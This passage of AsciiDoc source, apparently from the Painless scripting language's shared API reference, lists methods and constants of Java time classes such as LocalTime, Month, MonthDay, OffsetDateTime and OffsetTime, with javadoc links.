LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusHours(long)[minusHours](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusMinutes(long)[minusMinutes](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusMonths(long)[minusMonths](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusNanos(long)[minusNanos](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusSeconds(long)[minusSeconds](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusWeeks(long)[minusWeeks](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#minusYears(long)[minusYears](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusDays(long)[plusDays](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusHours(long)[plusHours](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusMinutes(long)[plusMinutes](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusMonths(long)[plusMonths](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusNanos(long)[plusNanos](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusSeconds(long)[plusSeconds](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusWeeks(long)[plusWeeks](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#plusYears(long)[plusYears](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toEpochSecond(java.time.ZoneOffset)[toEpochSecond](ZoneOffset) -* Instant {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toInstant(java.time.ZoneOffset)[toInstant](ZoneOffset) -* LocalDate {java11-javadoc}/java.base/java/time/LocalDateTime.html#toLocalDate()[toLocalDate]() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toLocalTime()[toLocalTime]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toString()[toString]() -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#truncatedTo(java.time.temporal.TemporalUnit)[truncatedTo](TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withDayOfMonth(int)[withDayOfMonth](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withDayOfYear(int)[withDayOfYear](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withHour(int)[withHour](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withMinute(int)[withMinute](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withMonth(int)[withMonth](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withSecond(int)[withSecond](int) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalDateTime.html#withYear(int)[withYear](int) - - -[[painless-api-reference-shared-LocalTime]] -==== LocalTime -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#MAX[MAX] -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#MIDNIGHT[MIDNIGHT] -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#MIN[MIN] -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#NOON[NOON] -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#of(int,int)[of](int, int) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#of(int,int,int)[of](int, int, int) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#of(int,int,int,int)[of](int, int, int, int) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#ofNanoOfDay(long)[ofNanoOfDay](long) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#ofSecondOfDay(long)[ofSecondOfDay](long) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* Temporal 
{java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* LocalDateTime {java11-javadoc}/java.base/java/time/LocalTime.html#atDate(java.time.LocalDate)[atDate](LocalDate) -* OffsetTime {java11-javadoc}/java.base/java/time/LocalTime.html#atOffset(java.time.ZoneOffset)[atOffset](ZoneOffset) -* int {java11-javadoc}/java.base/java/time/LocalTime.html#compareTo(java.time.LocalTime)[compareTo](LocalTime) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/LocalTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int {java11-javadoc}/java.base/java/time/LocalTime.html#getHour()[getHour]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/LocalTime.html#getMinute()[getMinute]() -* int {java11-javadoc}/java.base/java/time/LocalTime.html#getNano()[getNano]() -* int {java11-javadoc}/java.base/java/time/LocalTime.html#getSecond()[getSecond]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/LocalTime.html#isAfter(java.time.LocalTime)[isAfter](LocalTime) -* boolean {java11-javadoc}/java.base/java/time/LocalTime.html#isBefore(java.time.LocalTime)[isBefore](LocalTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minusHours(long)[minusHours](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minusMinutes(long)[minusMinutes](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minusNanos(long)[minusNanos](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#minusSeconds(long)[minusSeconds](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plusHours(long)[plusHours](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plusMinutes(long)[plusMinutes](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plusNanos(long)[plusNanos](long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#plusSeconds(long)[plusSeconds](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/LocalTime.html#toNanoOfDay()[toNanoOfDay]() -* int 
{java11-javadoc}/java.base/java/time/LocalTime.html#toSecondOfDay()[toSecondOfDay]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#truncatedTo(java.time.temporal.TemporalUnit)[truncatedTo](TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#withHour(int)[withHour](int) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#withMinute(int)[withMinute](int) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#withNano(int)[withNano](int) -* LocalTime {java11-javadoc}/java.base/java/time/LocalTime.html#withSecond(int)[withSecond](int) - - -[[painless-api-reference-shared-Month]] -==== Month -* static Month {java11-javadoc}/java.base/java/time/Month.html#APRIL[APRIL] -* static Month {java11-javadoc}/java.base/java/time/Month.html#AUGUST[AUGUST] -* static Month {java11-javadoc}/java.base/java/time/Month.html#DECEMBER[DECEMBER] -* static Month {java11-javadoc}/java.base/java/time/Month.html#FEBRUARY[FEBRUARY] -* static Month {java11-javadoc}/java.base/java/time/Month.html#JANUARY[JANUARY] -* static Month {java11-javadoc}/java.base/java/time/Month.html#JULY[JULY] -* static Month {java11-javadoc}/java.base/java/time/Month.html#JUNE[JUNE] -* static Month {java11-javadoc}/java.base/java/time/Month.html#MARCH[MARCH] -* static Month {java11-javadoc}/java.base/java/time/Month.html#MAY[MAY] -* static Month {java11-javadoc}/java.base/java/time/Month.html#NOVEMBER[NOVEMBER] -* static Month {java11-javadoc}/java.base/java/time/Month.html#OCTOBER[OCTOBER] -* static Month {java11-javadoc}/java.base/java/time/Month.html#SEPTEMBER[SEPTEMBER] -* static Month {java11-javadoc}/java.base/java/time/Month.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Month {java11-javadoc}/java.base/java/time/Month.html#of(int)[of](int) -* static Month {java11-javadoc}/java.base/java/time/Month.html#valueOf(java.lang.String)[valueOf](null) -* static Month[] {java11-javadoc}/java.base/java/time/Month.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/Month.html#firstDayOfYear(boolean)[firstDayOfYear](boolean) -* Month {java11-javadoc}/java.base/java/time/Month.html#firstMonthOfQuarter()[firstMonthOfQuarter]() -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/Month.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int 
{java11-javadoc}/java.base/java/time/Month.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/Month.html#length(boolean)[length](boolean) -* int {java11-javadoc}/java.base/java/time/Month.html#maxLength()[maxLength]() -* int {java11-javadoc}/java.base/java/time/Month.html#minLength()[minLength]() -* Month {java11-javadoc}/java.base/java/time/Month.html#minus(long)[minus](long) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* Month {java11-javadoc}/java.base/java/time/Month.html#plus(long)[plus](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MonthDay]] -==== MonthDay -* static MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#of(int,int)[of](int, int) -* static MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* LocalDate {java11-javadoc}/java.base/java/time/MonthDay.html#atYear(int)[atYear](int) -* int {java11-javadoc}/java.base/java/time/MonthDay.html#compareTo(java.time.MonthDay)[compareTo](MonthDay) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/MonthDay.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int {java11-javadoc}/java.base/java/time/MonthDay.html#getDayOfMonth()[getDayOfMonth]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* Month {java11-javadoc}/java.base/java/time/MonthDay.html#getMonth()[getMonth]() -* int {java11-javadoc}/java.base/java/time/MonthDay.html#getMonthValue()[getMonthValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/MonthDay.html#isAfter(java.time.MonthDay)[isAfter](MonthDay) -* boolean {java11-javadoc}/java.base/java/time/MonthDay.html#isBefore(java.time.MonthDay)[isBefore](MonthDay) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* boolean {java11-javadoc}/java.base/java/time/MonthDay.html#isValidYear(int)[isValidYear](int) -* def 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#with(java.time.Month)[with](Month) -* MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#withDayOfMonth(int)[withDayOfMonth](int) -* MonthDay {java11-javadoc}/java.base/java/time/MonthDay.html#withMonth(int)[withMonth](int) - - -[[painless-api-reference-shared-OffsetDateTime]] -==== OffsetDateTime -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#MAX[MAX] -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#MIN[MIN] -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#of(java.time.LocalDateTime,java.time.ZoneOffset)[of](LocalDateTime, ZoneOffset) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#of(java.time.LocalDate,java.time.LocalTime,java.time.ZoneOffset)[of](LocalDate, LocalTime, ZoneOffset) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#of(int,int,int,int,int,int,int,java.time.ZoneOffset)[of](int, int, int, int, int, int, int, ZoneOffset) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#ofInstant(java.time.Instant,java.time.ZoneId)[ofInstant](Instant, ZoneId) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* static Comparator {java11-javadoc}/java.base/java/time/OffsetDateTime.html#timeLineOrder()[timeLineOrder]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ZonedDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#atZoneSameInstant(java.time.ZoneId)[atZoneSameInstant](ZoneId) -* ZonedDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#atZoneSimilarLocal(java.time.ZoneId)[atZoneSimilarLocal](ZoneId) -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#compareTo(java.time.OffsetDateTime)[compareTo](OffsetDateTime) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/OffsetDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getDayOfMonth()[getDayOfMonth]() -* DayOfWeek {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getDayOfWeek()[getDayOfWeek]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getDayOfYear()[getDayOfYear]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getHour()[getHour]() -* long 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getMinute()[getMinute]() -* Month {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getMonth()[getMonth]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getMonthValue()[getMonthValue]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getNano()[getNano]() -* ZoneOffset {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getOffset()[getOffset]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getSecond()[getSecond]() -* int {java11-javadoc}/java.base/java/time/OffsetDateTime.html#getYear()[getYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/OffsetDateTime.html#isAfter(java.time.OffsetDateTime)[isAfter](OffsetDateTime) -* boolean {java11-javadoc}/java.base/java/time/OffsetDateTime.html#isBefore(java.time.OffsetDateTime)[isBefore](OffsetDateTime) -* boolean {java11-javadoc}/java.base/java/time/OffsetDateTime.html#isEqual(java.time.OffsetDateTime)[isEqual](OffsetDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusDays(long)[minusDays](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusHours(long)[minusHours](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusMinutes(long)[minusMinutes](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusMonths(long)[minusMonths](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusNanos(long)[minusNanos](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusSeconds(long)[minusSeconds](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusWeeks(long)[minusWeeks](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#minusYears(long)[minusYears](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusDays(long)[plusDays](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusHours(long)[plusHours](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusMinutes(long)[plusMinutes](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusMonths(long)[plusMonths](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusNanos(long)[plusNanos](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusSeconds(long)[plusSeconds](long) -* OffsetDateTime 
{java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusWeeks(long)[plusWeeks](long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#plusYears(long)[plusYears](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toInstant()[toInstant]() -* LocalDate {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toLocalDate()[toLocalDate]() -* LocalDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toLocalDateTime()[toLocalDateTime]() -* LocalTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toLocalTime()[toLocalTime]() -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toOffsetTime()[toOffsetTime]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#toZonedDateTime()[toZonedDateTime]() -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#truncatedTo(java.time.temporal.TemporalUnit)[truncatedTo](TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withDayOfMonth(int)[withDayOfMonth](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withDayOfYear(int)[withDayOfYear](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withHour(int)[withHour](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withMinute(int)[withMinute](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withMonth(int)[withMonth](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withNano(int)[withNano](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withOffsetSameInstant(java.time.ZoneOffset)[withOffsetSameInstant](ZoneOffset) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withOffsetSameLocal(java.time.ZoneOffset)[withOffsetSameLocal](ZoneOffset) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withSecond(int)[withSecond](int) -* OffsetDateTime {java11-javadoc}/java.base/java/time/OffsetDateTime.html#withYear(int)[withYear](int) - - -[[painless-api-reference-shared-OffsetTime]] -==== OffsetTime -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#MAX[MAX] -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#MIN[MIN] -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#of(java.time.LocalTime,java.time.ZoneOffset)[of](LocalTime, 
ZoneOffset) -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#of(int,int,int,int,java.time.ZoneOffset)[of](int, int, int, int, ZoneOffset) -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#ofInstant(java.time.Instant,java.time.ZoneId)[ofInstant](Instant, ZoneId) -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/time/OffsetTime.html#compareTo(java.time.OffsetTime)[compareTo](OffsetTime) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/OffsetTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int {java11-javadoc}/java.base/java/time/OffsetTime.html#getHour()[getHour]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/OffsetTime.html#getMinute()[getMinute]() -* int {java11-javadoc}/java.base/java/time/OffsetTime.html#getNano()[getNano]() -* ZoneOffset {java11-javadoc}/java.base/java/time/OffsetTime.html#getOffset()[getOffset]() -* int {java11-javadoc}/java.base/java/time/OffsetTime.html#getSecond()[getSecond]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/OffsetTime.html#isAfter(java.time.OffsetTime)[isAfter](OffsetTime) -* boolean {java11-javadoc}/java.base/java/time/OffsetTime.html#isBefore(java.time.OffsetTime)[isBefore](OffsetTime) -* boolean {java11-javadoc}/java.base/java/time/OffsetTime.html#isEqual(java.time.OffsetTime)[isEqual](OffsetTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minusHours(long)[minusHours](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minusMinutes(long)[minusMinutes](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minusNanos(long)[minusNanos](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#minusSeconds(long)[minusSeconds](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#plusHours(long)[plusHours](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#plusMinutes(long)[plusMinutes](long) -* OffsetTime 
